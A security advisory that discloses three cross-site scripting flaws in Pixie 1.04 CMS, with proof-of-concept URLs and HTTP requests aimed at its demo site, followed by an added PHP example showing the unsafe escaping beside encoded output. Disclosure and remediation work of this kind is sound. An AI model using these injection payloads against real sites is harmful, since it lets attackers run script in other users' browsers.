- #Title: Pixie 1.04 CMS - Multiple XSS
- #Version: 1.04 (Latest ATM)
- #Vendor: getpixie.co.uk
- #Demo: demo.getpixie.co.uk
- #Date: 01.26.2014
- #Contact: smash[at]devilteam.pl
- 1. Cross Site Scripting - GET 'm' parameter
- Request:
- host/?s=login&m=forgotten" onload=alert(666) bad="
- Injection point:
- <body class="pixie y2014 m1 d26 h12 s_login m_forgotten\" onload=alert(666) bad=\"">
- PoC:
- demo.getpixie.co.uk/admin/?s=login&m=forgotten" onload=alert(666) bad="
- 2. Cross Site Scripting - POST message
- Request:
- POST /admin/admin/modules/ajax_message.php HTTP/1.1
- Host: demo.getpixie.co.uk
- message=<script>alert(666)</script>
- Response:
- HTTP/1.1 200 OK
- Date: Sun, 26 Jan 2014 12:08:09 GMT
- Server: Apache
- X-Powered-By: PHP/5.3.28
- Cache-Control: max-age=1
- Expires: Sun, 26 Jan 2014 12:08:10 GMT
- Content-Length: 264
- Keep-Alive: timeout=2
- Connection: Keep-Alive
- Content-Type: text/html; charset=utf-8
- <span class="message_text_error"><img src="admin/theme/images/icons/error.png" /><script>alert(666)</script></span><span class="message_back"> (<a href="javascript:history.go(-1);" title="Back (Will reload any submitted form data)">go back »</a>)</span>
- 3. Cross Site Scripting - GET 'x' parameter
- Request:
- host/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78
- Injection point:
- <body class="pixie y2014 m1 d26 h12 s_login m_static x_page-1\" onload=alert(666) bad=\"">
- (...)
- <script type="text/javascript" src="jscript/pixie.js.php?s=login&x=page-1\" onload=alert(666) bad=\"&advmode=Toggle advanced Mode"></script>
- PoC:
- demo.getpixie.co.uk/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78
- 4.
- # DC72E3C143B5E0DE 1337day.com [2014-01-28] C9DE7F0E49DF30F3 #
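
Added example, not part of the original advisory and not Pixie's source: a PHP sketch of the two output contexts reported above (the `<body class>` attribute in items 1 and 3, the message `<span>` in item 2), with the backslash-escaped form beside an encoded one. The function names are hypothetical, and using `addslashes()` to reproduce the `\"` seen in the reflected markup is an assumption.

```php
<?php
// Added example: hypothetical helpers, not Pixie's source code.

// Before: quotes are only backslash-escaped, matching the reflected markup
// shown in the advisory. HTML has no backslash escape, so the '"' still
// terminates the class attribute and the rest is parsed as new attributes.
function body_class_slashed($s, $m) {
    return '<body class="pixie s_' . addslashes($s) . ' m_' . addslashes($m) . '">';
}

// After (attribute context): reduce each value to a class-token allowlist,
// then entity-encode with ENT_QUOTES as a second layer. ENT_QUOTES is passed
// explicitly because the default flags on PHP 5.3 leave single quotes alone.
function class_token($prefix, $value) {
    $safe = preg_replace('/[^A-Za-z0-9_-]/', '', (string) $value);
    return htmlspecialchars($prefix . '_' . $safe, ENT_QUOTES, 'UTF-8');
}

function body_class_encoded($s, $m) {
    return '<body class="pixie ' . class_token('s', $s) . ' '
         . class_token('m', $m) . '">';
}

// After (element content): encode the message before it is placed in the span,
// so markup in the POST body is rendered as text.
function message_span($message) {
    return '<span class="message_text_error">'
         . htmlspecialchars((string) $message, ENT_QUOTES, 'UTF-8')
         . '</span>';
}

// Constructed inputs, copied from the requests shown on this page.
$m = 'forgotten" onload=alert(666) bad="';
echo body_class_slashed('login', $m), "\n";
echo body_class_encoded('login', $m), "\n";
echo message_span('<script>alert(666)</script>'), "\n";
```

The same encoding applies to the `x` value reflected into the `pixie.js.php` script URL in item 3, with `rawurlencode()` applied to the query-string value before the attribute is entity-encoded.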